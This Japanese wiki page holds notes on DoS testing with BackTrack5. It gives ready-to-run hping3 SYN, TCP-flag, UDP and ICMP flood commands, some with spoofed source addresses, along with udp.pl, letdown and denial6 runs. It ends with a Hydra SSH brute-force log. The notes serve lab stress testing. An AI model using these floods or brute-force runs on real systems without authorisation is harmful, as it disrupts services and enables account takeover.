Top / DoS検査
HTML convert time: 0.019 sec.

DoS検査

Last-modified: 2011-08-05 (金) 11:28:47

DoS検査について、方法をまとめます。
BackTrack5の使用を前提としています。

※(他のページも同様ですが)本ページの内容は無保証です。

※常に書きかけ項目

ツールの場所

Applications>BackTrack>Stress Testing>Network Stress Testing

ツール一覧

テキストで列挙。

  • denial6
  • dos-new-ip6
  • flood_advertise6
  • flood_router6
  • hping2
  • hping3
  • letdown
  • rsmurf6
  • sendpees6
  • siege
  • smurf6
  • udp.pl

6って何だろう。IPv6対応?

TCP関連

SYN Flood

まずはhping3での実施方法。

【実際のコマンド】

hping3 -i u1000 -c 4 -S -p 443 xxx.xxx.xxx.xxx

参考情報

Example of a SYN flood attack using hping3 :

hping3 -q -n -a 10.0.0.1  -S  -s 53 --keep -p 22 --flood 192.168.0.2  

TCP Connection Flood

まずはhping3での実施方法。

説明(引用)

There are lots of possibilities of flooding using TCP. Just set the various TCP flags as you whish. Some TCP flooding techniques consist in setting a lot of unusual flags to perturb week O.S.

参考情報

Example with the SARFU scan :

hping3 -q -n -a 10.0.0.1  -SARFU -p 22 --flood 192.168.0.2  

【実際のコマンド】

hping3 -q -n -a 10.0.0.1 -SARFU -p 80 -i u1000 xxx.xxx.xxx.xxx

UDP関連

UDP Flood

まずはhping3での実施方法。
udp.plでも実施してみた。

hping3で実施

It is the same concept as in ICMP flood except that you send a huge amount of UDP data. UDP flood can be very dangerous for the network bandwidth.
Generating UDP flood with hping3 is easy :

hping3 -q -n -a 10.0.0.1  --udp  -s 53 --keep -p 68 --flood 192.168.0.2 

【実際のコマンド】

hping3 -i u1000 -c 4 -2 -p 53 xxx.xxx.xxx.xxx

udp.plで実施

動作することは確認。
手元ではなかなか、落ちるまでいかないので、一定時間実施して、落ちる or レスポンス低下を確認する。

【コマンド】

root@bt:/pentest/misc/udp-pl# perl ./udp.pl 192.168.80.132 53 1

【結果】

udp flood - odix
udp: no process found

確認はhping3で。

root@bt:/pentest/misc/udp-pl# hping3 -p 53 -c 4 -2 192.168.80.132
HPING 192.168.80.132 (eth2 192.168.80.132): udp mode set, 28 headers + 0 data bytes

ICMP関連

NW機器など、応答しないものについては実施しなくてよい。

ICMP flood

ICMP flooding consists to send a maximum ICMP data to a machine in the minimum amount of time, for example pings. In the "old" times it was possible to corrupt a machine using a single huge ping (the ping of death), hopefully these times are over, but it is still possible to attack the bandwidth and process time of any machine who accept ICMP packets.

Example of an ICMP flood using hping 3 :

hping3 -q -n -a 10.0.0.1 --id 0  --icmp -d 56 --flood 192.168.0.2

The -q option means quiet, the -n means no name resolving, ?id 0 if for ICMP echo request (ping), -d is size of the packet (56 is the normal size for a ping).

その他

hping3 --flood オプション

「--flood」オプションで、可能な限り早くSYNパケットを送信可能

※ログが出力されないので、テストの際は代替オプションとして「-i u1000」(1000micro sec間隔で送信)などを使用することが望ましい。

【実際のコマンド】
root@bt:/pentest/stressing/letdown# hping3 -p 80 -V --flood -c 4 -S 192.168.80.132
using eth2, addr: 192.168.80.131, MTU: 1500
HPING 192.168.80.132 (eth2 192.168.80.132): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C

  • 192.168.80.132 hping statistic ---
    1331517 packets tramitted, 0 packets received, 100% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms

HTTP

記載予定

参考URL

DoS

http://www.hackingtricks.in/search/label/DoS%20attack[外部リンク]

iptablesとhping3を使ったDoS検査
http://www.sevagas.com/?Iptables-firewall-versus-nmap-and,32[外部リンク]
UDP, TCP, SYN Floodコマンド記載

SYN Flood

http://mediakey.dk/~cc/hackerguide-syn-flood-attack/[外部リンク]

http://www39.atwiki.jp/vippre/pages/13.html[外部リンク]

http://www.packetlevel.ch/html/hping.html[外部リンク]

ツール関連

LetDown利用
http://bogus.jp/wp/?p=809[外部リンク]

各ツールの概説
http://www.n0where.net/2010/12/thc-ipv6.html[外部リンク]

以降、落書き置き場

denial6

root@bt:~# denial6
denial6 v1.4 (c) 2010 by van Hauser / THC <vh@thc.org> www.thc.org

Syntax: denial6 [-r] interface destination test-case-number

Performs various denial of service attacks on a target
If a system is vulnerable, it can crash or be under heavy load, so be careful!
If not test-case-number is supplied, the list of shown.
Use -r to use raw mode.


・denial6
なぜかエラー
root@bt:~# denial6 eth1 127.0.0.1 1
セグメンテーション違反です

dos-new-ip6
IPv6なのでとりあえず今回は関係なし

flood_advertise6
何だろう。
「 flood a target with random neighbor advertisements」

flood_router6
何だろう。
「flood a target with random router advertisements」

hping2
hping3

letdown
どうもうまく動かない。
root@bt:/pentest/stressing/letdown# ./letdown -d 192.168.80.132 -p 80 -S 00:0c:29:9e:5d:ca -D 00:0c:29:9e:5d:ca -v 2 -P payloads/http.txt
LetDown start: Thu Aug 4 00:53:51 2011
pcap_initialize() failed: Retrieving the source IP address failed: provide it with the options.

2) Exaples:

Generic attack:

# letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 21

Attack against a webserver using payload and firewall options:

# letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -f iptables -P payloads/http.txt

Connections from 3 ports < 1024 and with the time option:

# letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -x 80 -y 100 -t 10000

More info: http://complemento.sourceforge.net/[外部リンク]

rsmurf6

Linuxのみ?
「remote smurfer, known to work only against linux at the moment」

sendpees6

「a tool by willdamn(ad)gmail.com, which generates a neighbor solicitation requests with a lot of CGAs (crypto stuff ;-) to keep the CPU busy. nice.」

siege

smurf6

ひとまず今回は関係なし。
「local smurfer」


xHydra

Timeoutは100ms程度に設定する。
Timeoutが短すぎる(デフォルト30ms)と、レスポンスよりも前にタイムアウトし、
延々と同じID/PWでリトライしてしまう。

Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra)[外部リンク] starting at 2011-07-31 23:03:00
[DATA] 1 tasks, 1 servers, 8 login tries (l:1/p:8), ~8 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "root" - child 0 - 1 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "admin" - child 0 - 2 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "hello" - child 0 - 3 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "test" - child 0 - 4 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "sasasasa" - child 0 - 5 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "password" - child 0 - 6 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "test00" - child 0 - 7 of 8
[STATUS] attack finished for 192.168.32.133 (waiting for children to finish)
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "" - child 0 - 8 of 8
Hydra (http://www.thc.org/thc-hydra)[外部リンク] finished at 2011-07-31 23:03:27

finished>